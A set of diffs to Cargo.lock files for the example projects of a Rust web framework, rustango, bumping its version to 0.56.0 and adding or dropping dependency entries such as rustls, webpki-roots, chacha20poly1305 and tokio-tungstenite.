- "rustango",
- "serde",
- "serde_json",
- "sqlx",
- "tokio",
- "tracing",
-]
-
-[[package]]
-name = "rustc-hash"
-version = "2.1.3"
-source = "registry+https://github.com/rust-lang/crates.io-index"
-checksum = "6b1e7f9a428571be2dc5bc0505c13fb6bf936822b894ec87abf8a08a4e51742d"
-
-[[package]]
-name = "rustls"
-version = "0.23.43"
-source = "registry+https://github.com/rust-lang/crates.io-index"
-checksum = "0283386ce02abc0151e1761d08802dfe86c173b0b494af5cbc086574e453da06"
-dependencies = [
- "once_cell",
- "ring",
- "rustls-pki-types",
- "rustls-webpki",
- "subtle",
- "zeroize",
-]
-
-[[package]]
-name = "rustls-pki-types"
-version = "1.15.1"
-source = "registry+https://github.com/rust-lang/crates.io-index"
-checksum = "2f4925028c7eb5d1fcdaf196971378ed9d2c1c4efc7dc5d011256f76c99c0a96"
-dependencies = [
- "web-time",
- "zeroize",
-]
-
-[[package]]
-name = "rustls-webpki"
-version = "0.103.15"
-source = "registry+https://github.com/rust-lang/crates.io-index"
-checksum = "f3c3cf1d8b1e7d4927e2d154c3fcb02979afb9939629c62cd9048d4f07b60ac2"
-dependencies = [
- "ring",
- "rustls-pki-types",
- "untrusted",
 ]
 
 [[package]]
@@ -1897,15 +1669,6 @@ dependencies = [
 ]
 
 [[package]]
-name = "serde_spanned"
-version = "0.6.9"
-source = "registry+https://github.com/rust-lang/crates.io-index"
-checksum = "bf41e0cfaf7226dca15e8197172c295a782857fcb97fad1808a166870dee75a3"
-dependencies = [
- "serde",
-]
-
-[[package]]
 name = "serde_urlencoded"
 version = "0.7.1"
 source = "registry+https://github.com/rust-lang/crates.io-index"
@@ -1924,7 +1687,7 @@ source = "registry+https://github.com/rust-lang/crates.io-index"
 checksum = "a978451301f4db1d02937a4ab3ccce137717b81826e79b7d49ffe3244a13c3b8"
 dependencies = [
  "cfg-if",
- "cpufeatures 0.2.17",
+ "cpufeatures",
  "digest",
 ]
 
@@ -1935,7 +1698,7 @@ source = "registry+https://github.com/rust-lang/crates.io-index"
 checksum = "a7507d819769d01a365ab707794a4084392c824f54a7a6a7862f8c3d0892b283"
 dependencies = [
  "cfg-if",
- "cpufeatures 0.2.17",
+ "cpufeatures",
  "digest",
 ]
 
@@ -1973,12 +1736,6 @@ dependencies = [
  "digest",
  "rand_core 0.6.4",
 ]
-
-[[package]]
-name = "simd-adler32"
-version = "0.3.10"
-source = "registry+https://github.com/rust-lang/crates.io-index"
-checksum = "3a219298ac11a56ea9a6d2120044824d6f01aeb034955e7af7bc16858527deea"
 
 [[package]]
 name = "slab"
@@ -2279,9 +2036,6 @@ name = "sync_wrapper"
 version = "1.0.2"
 source = "registry+https://github.com/rust-lang/crates.io-index"
 checksum = "0bf256ce5efdfa370213c1dabab5935a12e49f2c58d15e9eac2870d3b4f27263"
-dependencies = [
- "futures-core",
-]
 
 [[package]]
 name = "synstructure"
@@ -2443,16 +2197,6 @@ dependencies = [
 ]
 
 [[package]]
-name = "tokio-rustls"
-version = "0.26.4"
-source = "registry+https://github.com/rust-lang/crates.io-index"
-checksum = "1729aa945f29d91ba541258c8df89027d5792d85a8841fb65e8bf0f4ede4ef61"
-dependencies = [
- "rustls",
- "tokio",
-]
-
-[[package]]
 name = "tokio-stream"
 version = "0.1.19"
 source = "registry+https://github.com/rust-lang/crates.io-index"
@@ -2461,27 +2205,6 @@ dependencies = [
  "futures-core",
  "pin-project-lite",
  "tokio",
-]
-
-[[package]]
-name = "toml"
-version = "0.8.23"
-source = "registry+https://github.com/rust-lang/crates.io-index"
-checksum = "dc1beb996b9d83529a9e75c17a1686767d148d70663143c7854d8b4a09ced362"
-dependencies = [
- "serde",
- "serde_spanned",
- "toml_datetime 0.6.11",
- "toml_edit 0.22.27",
-]
-
-[[package]]
-name = "toml_datetime"
-version = "0.6.11"
-source = "registry+https://github.com/rust-lang/crates.io-index"
-checksum = "22cddaf88f4fbc13c51aebbf5f8eceb5c7c5a9da2ac40a13519eb5b0a0e8f11c"
-dependencies = [
- "serde",
 ]
 
 [[package]]
@@ -2495,27 +2218,14 @@ dependencies = [
 
 [[package]]
 name = "toml_edit"
-version = "0.22.27"
-source = "registry+https://github.com/rust-lang/crates.io-index"
-checksum = "41fe8c660ae4257887cf66394862d21dbca4a6ddd26f04a3560410406a2f819a"
-dependencies = [
- "indexmap",
- "serde",
- "serde_spanned",
- "toml_datetime 0.6.11",
- "winnow 0.7.15",
-]
-
-[[package]]
-name = "toml_edit"
 version = "0.25.13+spec-1.1.0"
 source = "registry+https://github.com/rust-lang/crates.io-index"
 checksum = "6975367e4d2ef766d86af01ffad14b622fecc8d4357a998fbc4deb6e9bacaf9b"
 dependencies = [
  "indexmap",
- "toml_datetime 1.1.1+spec-1.1.0",
+ "toml_datetime",
  "toml_parser",
- "winnow 1.0.4",
+ "winnow",
 ]
 
 [[package]]
@@ -2524,7 +2234,7 @@ version = "1.1.3+spec-1.1.0"
 source = "registry+https://github.com/rust-lang/crates.io-index"
 checksum = "1d38ac1cf9b95face32296c0a3ede1fdc270627c9d9c02a7274dd6d960dc4d56"
 dependencies = [
- "winnow 1.0.4",
+ "winnow",
 ]
 
 [[package]]
@@ -2540,24 +2250,6 @@ dependencies = [
  "tokio",
  "tower-layer",
  "tower-service",
-]
-
-[[package]]
-name = "tower-http"
-version = "0.6.11"
-source = "registry+https://github.com/rust-lang/crates.io-index"
-checksum = "4cfcf7e2740e6fc6d4d688b4ef00650406bb94adf4731e43c096c3a19fe40840"
-dependencies = [
- "bitflags",
- "bytes",
- "futures-util",
- "http",
- "http-body",
- "pin-project-lite",
- "tower",
- "tower-layer",
- "tower-service",
- "url",
 ]
 
 [[package]]
@@ -2647,12 +2339,6 @@ dependencies = [
 ]
 
 [[package]]
-name = "try-lock"
-version = "0.2.5"
-source = "registry+https://github.com/rust-lang/crates.io-index"
-checksum = "e421abadd41a4225275504ea4d6566923418b7f05506fbc9c0fe86ba7396114b"
-
-[[package]]
 name = "typenum"
 version = "1.20.1"
 source = "registry+https://github.com/rust-lang/crates.io-index"
@@ -2696,12 +2382,6 @@ name = "unicode-segmentation"
 version = "1.13.3"
 source = "registry+https://github.com/rust-lang/crates.io-index"
 checksum = "c6f5d3c3b1bf09027a88a6bc961fc00497d651009560b5463668dc81b0fa87a8"
-
-[[package]]
-name = "untrusted"
-version = "0.9.0"
-source = "registry+https://github.com/rust-lang/crates.io-index"
-checksum = "8ecb6da28b8a351d773b68d5825ac39017e680750f980f3a1a85cd8dd28a47c1"
 
 [[package]]
 name = "url"
@@ -2762,15 +2442,6 @@ dependencies = [
 ]
 
 [[package]]
-name = "want"
-version = "0.3.1"
-source = "registry+https://github.com/rust-lang/crates.io-index"
-checksum = "bfa7760aed19e106de2c7c0b581b509f2f25d3dacaf737cb82ac61bc6d760b0e"
-dependencies = [
- "try-lock",
-]
-
-[[package]]
 name = "wasi"
 version = "0.11.1+wasi-snapshot-preview1"
 source = "registry+https://github.com/rust-lang/crates.io-index"
@@ -2806,16 +2477,6 @@ dependencies = [
 ]
 
 [[package]]
-name = "wasm-bindgen-futures"
-version = "0.4.77"
-source = "registry+https://github.com/rust-lang/crates.io-index"
-checksum = "6b7777d5cc23d0e91404e53ce2d5e8ec7acae3026b16233dba62cd3246457950"
-dependencies = [
- "js-sys",
- "wasm-bindgen",
-]
-
-[[package]]
 name = "wasm-bindgen-macro"
 version = "0.2.127"
 source = "registry+https://github.com/rust-lang/crates.io-index"
@@ -2845,35 +2506,6 @@ source = "registry+https://github.com/rust-lang/crates.io-index"
 checksum = "7ef64dbcc55df09c7e5a46182d181c2cfa3e925f3da937ea764728b4bbb9dcbf"
 dependencies = [
  "unicode-ident",
-]
-
-[[package]]
-name = "web-sys"
-version = "0.3.104"
-source = "registry+https://github.com/rust-lang/crates.io-index"
-checksum = "c435338968042f4f59a557f690a253676d47ce13ceb55d70100e7facf6620a30"
-dependencies = [
- "js-sys",
- "wasm-bindgen",
-]
-
-[[package]]
-name = "web-time"
-version = "1.1.0"
-source = "registry+https://github.com/rust-lang/crates.io-index"
-checksum = "5a6580f308b1fad9207618087a65c04e7a10bc77e02c8e84e9b00dd4b12fa0bb"
-dependencies = [
- "js-sys",
- "wasm-bindgen",
-]
-
-[[package]]
-name = "webpki-roots"
-version = "1.0.9"
-source = "registry+https://github.com/rust-lang/crates.io-index"
-checksum = "7dcd9d09a39985f5344844e66b0c530a33843579125f23e21e9f0f220850f22a"
-dependencies = [
- "rustls-pki-types",
 ]
 
 [[package]]
@@ -2960,16 +2592,7 @@ version = "0.48.0"
 source = "registry+https://github.com/rust-lang/crates.io-index"
 checksum = "677d2418bec65e3338edb076e806bc1ec15693c5d0104683f2efe857f61056a9"
 dependencies = [
- "windows-targets 0.48.5",
-]
-
-[[package]]
-name = "windows-sys"
-version = "0.52.0"
-source = "registry+https://github.com/rust-lang/crates.io-index"
-checksum = "282be5f36a8ce781fad8c8ae18fa3f9beff57ec1b52cb3de0789201425d9a33d"
-dependencies = [
- "windows-targets 0.52.6",
+ "windows-targets",
 ]
 
 [[package]]
@@ -2987,29 +2610,13 @@ version = "0.48.5"
 source = "registry+https://github.com/rust-lang/crates.io-index"
 checksum = "9a2fa6e2155d7247be68c096456083145c183cbbbc2764150dda45a87197940c"
 dependencies = [
- "windows_aarch64_gnullvm 0.48.5",
- "windows_aarch64_msvc 0.48.5",
- "windows_i686_gnu 0.48.5",
- "windows_i686_msvc 0.48.5",
- "windows_x86_64_gnu 0.48.5",
- "windows_x86_64_gnullvm 0.48.5",
- "windows_x86_64_msvc 0.48.5",
-]
-
-[[package]]
-name = "windows-targets"
-version = "0.52.6"
-source = "registry+https://github.com/rust-lang/crates.io-index"
-checksum = "9b724f72796e036ab90c1021d4780d4d3d648aca59e491e6b98e725b84e99973"
-dependencies = [
- "windows_aarch64_gnullvm 0.52.6",
- "windows_aarch64_msvc 0.52.6",
- "windows_i686_gnu 0.52.6",
- "windows_i686_gnullvm",
- "windows_i686_msvc 0.52.6",
- "windows_x86_64_gnu 0.52.6",
- "windows_x86_64_gnullvm 0.52.6",
- "windows_x86_64_msvc 0.52.6",
+ "windows_aarch64_gnullvm",
+ "windows_aarch64_msvc",
+ "windows_i686_gnu",
+ "windows_i686_msvc",
+ "windows_x86_64_gnu",
+ "windows_x86_64_gnullvm",
+ "windows_x86_64_msvc",
 ]
 
 [[package]]
@@ -3019,22 +2626,10 @@ source = "registry+https://github.com/rust-lang/crates.io-index"
 checksum = "2b38e32f0abccf9987a4e3079dfb67dcd799fb61361e53e2882c3cbaf0d905d8"
 
 [[package]]
-name = "windows_aarch64_gnullvm"
-version = "0.52.6"
-source = "registry+https://github.com/rust-lang/crates.io-index"
-checksum = "32a4622180e7a0ec044bb555404c800bc9fd9ec262ec147edd5989ccd0c02cd3"
-
-[[package]]
 name = "windows_aarch64_msvc"
 version = "0.48.5"
 source = "registry+https://github.com/rust-lang/crates.io-index"
 checksum = "dc35310971f3b2dbbf3f0690a219f40e2d9afcf64f9ab7cc1be722937c26b4bc"
-
-[[package]]
-name = "windows_aarch64_msvc"
-version = "0.52.6"
-source = "registry+https://github.com/rust-lang/crates.io-index"
-checksum = "09ec2a7bb152e2252b53fa7803150007879548bc709c039df7627cabbd05d469"
 
 [[package]]
 name = "windows_i686_gnu"
@@ -3043,28 +2638,10 @@ source = "registry+https://github.com/rust-lang/crates.io-index"
 checksum = "a75915e7def60c94dcef72200b9a8e58e5091744960da64ec734a6c6e9b3743e"
 
 [[package]]
-name = "windows_i686_gnu"
-version = "0.52.6"
-source = "registry+https://github.com/rust-lang/crates.io-index"
-checksum = "8e9b5ad5ab802e97eb8e295ac6720e509ee4c243f69d781394014ebfe8bbfa0b"
-
-[[package]]
-name = "windows_i686_gnullvm"
-version = "0.52.6"
-source = "registry+https://github.com/rust-lang/crates.io-index"
-checksum = "0eee52d38c090b3caa76c563b86c3a4bd71ef1a819287c19d586d7334ae8ed66"
-
-[[package]]
 name = "windows_i686_msvc"
 version = "0.48.5"
 source = "registry+https://github.com/rust-lang/crates.io-index"
 checksum = "8f55c233f70c4b27f66c523580f78f1004e8b5a8b659e05a4eb49d4166cca406"
-
-[[package]]
-name = "windows_i686_msvc"
-version = "0.52.6"
-source = "registry+https://github.com/rust-lang/crates.io-index"
-checksum = "240948bc05c5e7c6dabba28bf89d89ffce3e303022809e73deaefe4f6ec56c66"
 
 [[package]]
 name = "windows_x86_64_gnu"
@@ -3073,43 +2650,16 @@ source = "registry+https://github.com/rust-lang/crates.io-index"
 checksum = "53d40abd2583d23e4718fddf1ebec84dbff8381c07cae67ff7768bbf19c6718e"
 
 [[package]]
-name = "windows_x86_64_gnu"
-version = "0.52.6"
-source = "registry+https://github.com/rust-lang/crates.io-index"
-checksum = "147a5c80aabfbf0c7d901cb5895d1de30ef2907eb21fbbab29ca94c5b08b1a78"
-
-[[package]]
 name = "windows_x86_64_gnullvm"
 version = "0.48.5"
 source = "registry+https://github.com/rust-lang/crates.io-index"
 checksum = "0b7b52767868a23d5bab768e390dc5f5c55825b6d30b86c844ff2dc7414044cc"
 
 [[package]]
-name = "windows_x86_64_gnullvm"
-version = "0.52.6"
-source = "registry+https://github.com/rust-lang/crates.io-index"
-checksum = "24d5b23dc417412679681396f2b49f3de8c1473deb516bd34410872eff51ed0d"
-
-[[package]]
 name = "windows_x86_64_msvc"
 version = "0.48.5"
 source = "registry+https://github.com/rust-lang/crates.io-index"
 checksum = "ed94fce61571a4006852b7389a063ab983c02eb1bb37b47f8272ce92d06d9538"
-
-[[package]]
-name = "windows_x86_64_msvc"
-version = "0.52.6"
-source = "registry+https://github.com/rust-lang/crates.io-index"
-checksum = "589f6da84c646204747d1270a2a5661ea66ed1cced2631d546fdfb155959f9ec"
-
-[[package]]
-name = "winnow"
-version = "0.7.15"
-source = "registry+https://github.com/rust-lang/crates.io-index"
-checksum = "df79d97927682d2fd8adb29682d1140b343be4ac0f08fd68b7765d9c059d3945"
-dependencies = [
- "memchr",
-]
 
 [[package]]
 name = "winnow"
@@ -3234,12 +2784,6 @@ dependencies = [
  "quote",
  "syn 3.0.4",
 ]
-
-[[package]]
-name = "zlib-rs"
-version = "0.6.7"
-source = "registry+https://github.com/rust-lang/crates.io-index"
-checksum = "34b31d188d9d685a4f9c7b46d6e36631b07058d2cfe190267adce54dc230bf12"
 
 [[package]]
 name = "zmij"

--- a/crates/rustango/examples/mcp_demo/Cargo.lock
+++ b/crates/rustango/examples/mcp_demo/Cargo.lock
@@ -1540,7 +1540,7 @@ dependencies = [
 
 [[package]]
 name = "rustango"
-version = "0.55.0"
+version = "0.56.0"
 dependencies = [
  "argon2",
  "async-stream",
@@ -1578,7 +1578,7 @@ dependencies = [
 
 [[package]]
 name = "rustango-macros"
-version = "0.55.0"
+version = "0.56.0"
 dependencies = [
  "proc-macro-crate",
  "proc-macro2",

--- a/crates/rustango/examples/mcp_demo/Cargo.lock
+++ b/crates/rustango/examples/mcp_demo/Cargo.lock
@@ -2156,9 +2156,9 @@ dependencies = [
 
 [[package]]
 name = "tinyvec"
-version = "1.12.0"
+version = "1.13.1"
 source = "registry+https://github.com/rust-lang/crates.io-index"
-checksum = "bb4ebadaa0af04fab11ae01eb5f9fdb5f9c5b875506e210e71c07873528baa7f"
+checksum = "22e6cd18156ba6530d7deea039a6c1a6ec4f173dd330a9a53a4ea569fe85abac"
 dependencies = [
  "tinyvec_macros",
 ]

--- a/crates/rustango/examples/orm_cookbook/Cargo.lock
+++ b/crates/rustango/examples/orm_cookbook/Cargo.lock
@@ -2509,9 +2509,9 @@ dependencies = [
 
 [[package]]
 name = "tinyvec"
-version = "1.12.0"
+version = "1.13.1"
 source = "registry+https://github.com/rust-lang/crates.io-index"
-checksum = "bb4ebadaa0af04fab11ae01eb5f9fdb5f9c5b875506e210e71c07873528baa7f"
+checksum = "22e6cd18156ba6530d7deea039a6c1a6ec4f173dd330a9a53a4ea569fe85abac"
 dependencies = [
  "tinyvec_macros",
 ]

--- a/crates/rustango/examples/orm_cookbook/Cargo.lock
+++ b/crates/rustango/examples/orm_cookbook/Cargo.lock
@@ -876,7 +876,7 @@ dependencies = [
  "tokio",
  "tokio-rustls",
  "tower-service",
- "webpki-roots",
+ "webpki-roots 1.0.9",
 ]
 
 [[package]]
@@ -1752,7 +1752,7 @@ dependencies = [
  "wasm-bindgen",
  "wasm-bindgen-futures",
  "web-sys",
- "webpki-roots",
+ "webpki-roots 1.0.9",
 ]
 
 [[package]]
@@ -1829,7 +1829,7 @@ dependencies = [
 
 [[package]]
 name = "rustango"
-version = "0.55.0"
+version = "0.56.0"
 dependencies = [
  "argon2",
  "async-trait",
@@ -1872,7 +1872,7 @@ dependencies = [
 
 [[package]]
 name = "rustango-macros"
-version = "0.55.0"
+version = "0.56.0"
 dependencies = [
  "proc-macro-crate",
  "proc-macro2",
@@ -2169,6 +2169,7 @@ dependencies = [
  "once_cell",
  "percent-encoding",
  "rust_decimal",
+ "rustls",
  "serde",
  "serde_json",
  "sha2",
@@ -2179,6 +2180,7 @@ dependencies = [
  "tracing",
  "url",
  "uuid",
+ "webpki-roots 0.26.11",
 ]
 
 [[package]]
@@ -3016,6 +3018,15 @@ checksum = "5a6580f308b1fad9207618087a65c04e7a10bc77e02c8e84e9b00dd4b12fa0bb"
 dependencies = [
  "js-sys",
  "wasm-bindgen",
+]
+
+[[package]]
+name = "webpki-roots"
+version = "0.26.11"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "521bc38abb08001b01866da9f51eb7c5d647a19260e00054a8c7fd5f9e57f7a9"
+dependencies = [
+ "webpki-roots 1.0.9",
 ]
 
 [[package]]

--- a/crates/rustango/examples/orm_cookbook/Cargo.lock
+++ b/crates/rustango/examples/orm_cookbook/Cargo.lock
@@ -9,6 +9,16 @@ source = "registry+https://github.com/rust-lang/crates.io-index"
 checksum = "320119579fcad9c21884f5c4861d16174d0e06250625266f50fe6898340abefa"
 
 [[package]]
+name = "aead"
+version = "0.5.2"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "d122413f284cf2d62fb1b7db97e02edb8cda96d769b16e443a4f6195e35662b0"
+dependencies = [
+ "crypto-common",
+ "generic-array",
+]
+
+[[package]]
 name = "aho-corasick"
 version = "1.1.5"
 source = "registry+https://github.com/rust-lang/crates.io-index"
@@ -89,6 +99,7 @@ source = "registry+https://github.com/rust-lang/crates.io-index"
 checksum = "31b698c5f9a010f6573133b09e0de5408834d0c82f8d7475a89fc1867a71cd90"
 dependencies = [
  "axum-core",
+ "base64",
  "bytes",
  "form_urlencoded",
  "futures-util",
@@ -101,14 +112,17 @@ dependencies = [
  "matchit",
  "memchr",
  "mime",
+ "multer",
  "percent-encoding",
  "pin-project-lite",
  "serde_core",
  "serde_json",
  "serde_path_to_error",
  "serde_urlencoded",
+ "sha1",
  "sync_wrapper",
  "tokio",
+ "tokio-tungstenite",
  "tower",
  "tower-layer",
  "tower-service",
@@ -247,6 +261,17 @@ checksum = "f079e83a288787bcd14a6aea84cee5c87a67c5a3e660c30f557a3d24761b3527"
 
 [[package]]
 name = "chacha20"
+version = "0.9.1"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "c3613f74bd2eac03dad61bd53dbe620703d4371614fe0bc3b9f04dd36fe4e818"
+dependencies = [
+ "cfg-if",
+ "cipher",
+ "cpufeatures 0.2.17",
+]
+
+[[package]]
+name = "chacha20"
 version = "0.10.2"
 source = "registry+https://github.com/rust-lang/crates.io-index"
 checksum = "65c35e4b699c7e15ccbe7ee35c005e4fc0a278d22238a2857e6ce2dadeda1b06"
@@ -254,6 +279,19 @@ dependencies = [
  "cfg-if",
  "cpufeatures 0.3.1",
  "rand_core 0.10.1",
+]
+
+[[package]]
+name = "chacha20poly1305"
+version = "0.10.1"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "10cd79432192d1c0f4e1a0fef9527696cc039165d729fb41b3f4f4f354c2dc35"
+dependencies = [
+ "aead",
+ "chacha20 0.9.1",
+ "cipher",
+ "poly1305",
+ "zeroize",
 ]
 
 [[package]]
@@ -266,6 +304,17 @@ dependencies = [
  "num-traits",
  "serde",
  "windows-link",
+]
+
+[[package]]
+name = "cipher"
+version = "0.4.4"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "773f3b9af64447d2ce9850330c473515014aa235e6a783b02db81ff39e4a3dad"
+dependencies = [
+ "crypto-common",
+ "inout",
+ "zeroize",
 ]
 
 [[package]]
@@ -382,8 +431,15 @@ source = "registry+https://github.com/rust-lang/crates.io-index"
 checksum = "78c8292055d1c1df0cce5d180393dc8cce0abec0a7102adb6c7b1eef6016d60a"
 dependencies = [
  "generic-array",
+ "rand_core 0.6.4",
  "typenum",
 ]
+
+[[package]]
+name = "data-encoding"
+version = "2.11.1"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "4583a4551df46e2792f82ceeac45e850d2e2d5debba0b91f102385cda5b11f06"
 
 [[package]]
 name = "der"
@@ -441,6 +497,15 @@ source = "registry+https://github.com/rust-lang/crates.io-index"
 checksum = "252afb9ae5eaa683babdc6a068b3f5726eb19e05070c731f9b2a23a7c3e8ed34"
 dependencies = [
  "serde",
+]
+
+[[package]]
+name = "encoding_rs"
+version = "0.8.35"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "75030f3c4f45dafd7586dd6780965a8c7e8e285a5ecb86713e63a79c5b2766f3"
+dependencies = [
+ "cfg-if",
 ]
 
 [[package]]
@@ -994,6 +1059,15 @@ dependencies = [
 ]
 
 [[package]]
+name = "inout"
+version = "0.1.4"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "879f10e63c20629ecabbb64a8010319738c66a5cd0c29b02d63d272b03751d01"
+dependencies = [
+ "generic-array",
+]
+
+[[package]]
 name = "inventory"
 version = "0.3.24"
 source = "registry+https://github.com/rust-lang/crates.io-index"
@@ -1155,6 +1229,23 @@ dependencies = [
 ]
 
 [[package]]
+name = "multer"
+version = "3.1.0"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "83e87776546dc87511aa5ee218730c92b666d7264ab6ed41f9d215af9cd5224b"
+dependencies = [
+ "bytes",
+ "encoding_rs",
+ "futures-util",
+ "http",
+ "httparse",
+ "memchr",
+ "mime",
+ "spin",
+ "version_check",
+]
+
+[[package]]
 name = "num-bigint-dig"
 version = "0.8.6"
 source = "registry+https://github.com/rust-lang/crates.io-index"
@@ -1210,6 +1301,23 @@ name = "once_cell"
 version = "1.21.4"
 source = "registry+https://github.com/rust-lang/crates.io-index"
 checksum = "9f7c3e4beb33f85d45ae3e3a1792185706c8e16d043238c593331cc7cd313b50"
+
+[[package]]
+name = "opaque-debug"
+version = "0.3.1"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "c08d65885ee38876c4f86fa503fb49d7b507c2b62552df7c70b2fce627e06381"
+
+[[package]]
+name = "orm_cookbook"
+version = "0.1.0"
+dependencies = [
+ "chrono",
+ "rustango",
+ "serde",
+ "serde_json",
+ "tokio",
+]
 
 [[package]]
 name = "parking"
@@ -1346,6 +1454,17 @@ name = "plain"
 version = "0.2.3"
 source = "registry+https://github.com/rust-lang/crates.io-index"
 checksum = "b4596b6d070b27117e987119b4dac604f3c58cfb0b191112e24771b2faeac1a6"
+
+[[package]]
+name = "poly1305"
+version = "0.8.0"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "8159bd90725d2df49889a078b54f4f79e87f1f8a8444194cdca81d38f5393abf"
+dependencies = [
+ "cpufeatures 0.2.17",
+ "opaque-debug",
+ "universal-hash",
+]
 
 [[package]]
 name = "potential_utf"
@@ -1493,7 +1612,7 @@ version = "0.10.2"
 source = "registry+https://github.com/rust-lang/crates.io-index"
 checksum = "c7f5fa3a058cd35567ef9bfa5e75732bee0f9e4c55fa90477bef2dfcdbc4be80"
 dependencies = [
- "chacha20",
+ "chacha20 0.10.2",
  "getrandom 0.4.3",
  "rand_core 0.10.1",
 ]
@@ -1716,6 +1835,7 @@ dependencies = [
  "async-trait",
  "axum",
  "base64",
+ "chacha20poly1305",
  "chrono",
  "cookie",
  "flate2",
@@ -1733,6 +1853,7 @@ dependencies = [
  "serde",
  "serde_json",
  "serde_urlencoded",
+ "sha1",
  "sha2",
  "sqlx",
  "subtle",
@@ -1745,6 +1866,7 @@ dependencies = [
  "tracing",
  "tracing-appender",
  "tracing-subscriber",
+ "urlencoding",
  "uuid",
 ]
 
@@ -1757,21 +1879,6 @@ dependencies = [
  "quote",
  "serde_json",
  "syn 2.0.119",
-]
-
-[[package]]
-name = "rustango-showcase"
-version = "0.0.0"
-dependencies = [
- "axum",
- "chrono",
- "dotenvy",
- "rustango",
- "serde",
- "serde_json",
- "sqlx",
- "tokio",
- "tracing",
 ]
 
 [[package]]
@@ -2464,6 +2571,18 @@ dependencies = [
 ]
 
 [[package]]
+name = "tokio-tungstenite"
+version = "0.29.0"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "8f72a05e828585856dacd553fba484c242c46e391fb0e58917c942ee9202915c"
+dependencies = [
+ "futures-util",
+ "log",
+ "tokio",
+ "tungstenite",
+]
+
+[[package]]
 name = "toml"
 version = "0.8.23"
 source = "registry+https://github.com/rust-lang/crates.io-index"
@@ -2653,6 +2772,22 @@ source = "registry+https://github.com/rust-lang/crates.io-index"
 checksum = "e421abadd41a4225275504ea4d6566923418b7f05506fbc9c0fe86ba7396114b"
 
 [[package]]
+name = "tungstenite"
+version = "0.29.0"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "6c01152af293afb9c7c2a57e4b559c5620b421f6d133261c60dd2d0cdb38e6b8"
+dependencies = [
+ "bytes",
+ "data-encoding",
+ "http",
+ "httparse",
+ "log",
+ "rand 0.9.5",
+ "sha1",
+ "thiserror 2.0.20",
+]
+
+[[package]]
 name = "typenum"
 version = "1.20.1"
 source = "registry+https://github.com/rust-lang/crates.io-index"
@@ -2698,6 +2833,16 @@ source = "registry+https://github.com/rust-lang/crates.io-index"
 checksum = "c6f5d3c3b1bf09027a88a6bc961fc00497d651009560b5463668dc81b0fa87a8"
 
 [[package]]
+name = "universal-hash"
+version = "0.5.1"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "fc1de2c688dc15305988b563c3854064043356019f97a4b46276fe734c4f07ea"
+dependencies = [
+ "crypto-common",
+ "subtle",
+]
+
+[[package]]
 name = "untrusted"
 version = "0.9.0"
 source = "registry+https://github.com/rust-lang/crates.io-index"
@@ -2714,6 +2859,12 @@ dependencies = [
  "percent-encoding",
  "serde",
 ]
+
+[[package]]
+name = "urlencoding"
+version = "2.1.3"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "daf8dba3b7eb870caf1ddeed7bc9d2a049f3cfdfae7cb521b087cc33ae4c49da"
 
 [[package]]
 name = "utf8_iter"

--- a/crates/rustango/examples/tenant_user_extension/Cargo.lock
+++ b/crates/rustango/examples/tenant_user_extension/Cargo.lock
@@ -3,12 +3,6 @@
 version = 4
 
 [[package]]
-name = "adler2"
-version = "2.0.1"
-source = "registry+https://github.com/rust-lang/crates.io-index"
-checksum = "320119579fcad9c21884f5c4861d16174d0e06250625266f50fe6898340abefa"
-
-[[package]]
 name = "aho-corasick"
 version = "1.1.5"
 source = "registry+https://github.com/rust-lang/crates.io-index"
@@ -40,7 +34,7 @@ checksum = "3c3610892ee6e0cbce8ae2700349fcf8f98adb0dbfbee85aec3c9179d29cc072"
 dependencies = [
  "base64ct",
  "blake2",
- "cpufeatures 0.2.17",
+ "cpufeatures",
  "password-hash",
 ]
 
@@ -101,6 +95,7 @@ dependencies = [
  "matchit",
  "memchr",
  "mime",
+ "multer",
  "percent-encoding",
  "pin-project-lite",
  "serde_core",
@@ -246,17 +241,6 @@ source = "registry+https://github.com/rust-lang/crates.io-index"
 checksum = "f079e83a288787bcd14a6aea84cee5c87a67c5a3e660c30f557a3d24761b3527"
 
 [[package]]
-name = "chacha20"
-version = "0.10.2"
-source = "registry+https://github.com/rust-lang/crates.io-index"
-checksum = "65c35e4b699c7e15ccbe7ee35c005e4fc0a278d22238a2857e6ce2dadeda1b06"
-dependencies = [
- "cfg-if",
- "cpufeatures 0.3.1",
- "rand_core 0.10.1",
-]
-
-[[package]]
 name = "chrono"
 version = "0.4.45"
 source = "registry+https://github.com/rust-lang/crates.io-index"
@@ -300,15 +284,6 @@ dependencies = [
 ]
 
 [[package]]
-name = "cpufeatures"
-version = "0.3.1"
-source = "registry+https://github.com/rust-lang/crates.io-index"
-checksum = "5ca28b0ae3115b884660db4118d803791fd6756b6e88f39c0f3f7859060d7566"
-dependencies = [
- "libc",
-]
-
-[[package]]
 name = "crc"
 version = "3.4.0"
 source = "registry+https://github.com/rust-lang/crates.io-index"
@@ -322,15 +297,6 @@ name = "crc-catalog"
 version = "2.5.0"
 source = "registry+https://github.com/rust-lang/crates.io-index"
 checksum = "217698eaf96b4a3f0bc4f3662aaa55bdf913cd54d7204591faa790070c6d0853"
-
-[[package]]
-name = "crc32fast"
-version = "1.5.1"
-source = "registry+https://github.com/rust-lang/crates.io-index"
-checksum = "8498c871161e1742aaa9d52551b2d6ebdd4c3d45a3be423e3728f33b955be550"
-dependencies = [
- "cfg-if",
-]
 
 [[package]]
 name = "crossbeam-channel"
@@ -444,6 +410,15 @@ dependencies = [
 ]
 
 [[package]]
+name = "encoding_rs"
+version = "0.8.35"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "75030f3c4f45dafd7586dd6780965a8c7e8e285a5ecb86713e63a79c5b2766f3"
+dependencies = [
+ "cfg-if",
+]
+
+[[package]]
 name = "equivalent"
 version = "1.0.2"
 source = "registry+https://github.com/rust-lang/crates.io-index"
